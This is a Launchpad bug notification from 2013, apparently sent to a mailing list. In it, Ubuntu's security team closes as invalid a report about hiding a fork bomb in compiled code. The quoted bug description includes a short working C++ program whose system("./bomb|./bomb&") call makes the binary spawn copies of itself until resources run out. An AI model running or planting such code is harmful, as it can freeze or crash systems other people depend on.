[Bug 1101691] Re: Security alert: Concealment of shell fork bomb inside compiled code
Marc Deslauriers
marc.deslauriers at canonical.com
Wed Jan 30 16:05:30 UTC 2013
Thanks for taking the time to report this bug and helping to make Ubuntu better. This is not a bug, but rather expected behavior:
https://wiki.ubuntu.com/SecurityTeam/Policies#Unlimited_Local_Resource_Utilization
Please feel free to report any other bugs you may find.
** Information type changed from Public Security to Public
** Changed in: bash (Ubuntu)
Status: New => Invalid
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1101691
Title:
Security alert: Concealment of shell fork bomb inside compiled code
Status in “bash” package in Ubuntu:
Invalid
Bug description:
$ gedit bomb.cpp
> #include <iostream>
> #include <cstdio>
> #include <cstdlib>
>
> using namespace std;
>
> int main() {
> system("./bomb|./bomb&");
> return 0;
> }
$ g++ bomb.cpp -o bomb
$ ./bomb
As can be seen, it's VERY easy to use the "system" function as a means
of hiding a shell fork bomb inside an object file -- a chilling tale
indeed.
ProblemType: Bug
DistroRelease: Ubuntu 12.10
Package: bash 4.2-5ubuntu1
Uname: Linux 3.4.0 x86_64
ApportVersion: 2.6.1-0ubuntu9
Architecture: amd64
Date: Fri Jan 18 23:11:58 2013
InstallationDate: Installed on 2012-04-26 (267 days ago)
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MarkForUpload: True
ProcEnviron:
TERM=xterm
PATH=(custom, no user)
XDG_RUNTIME_DIR=<set>
LANG=en_US.UTF-8
SHELL=/bin/bash
SourcePackage: bash
UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)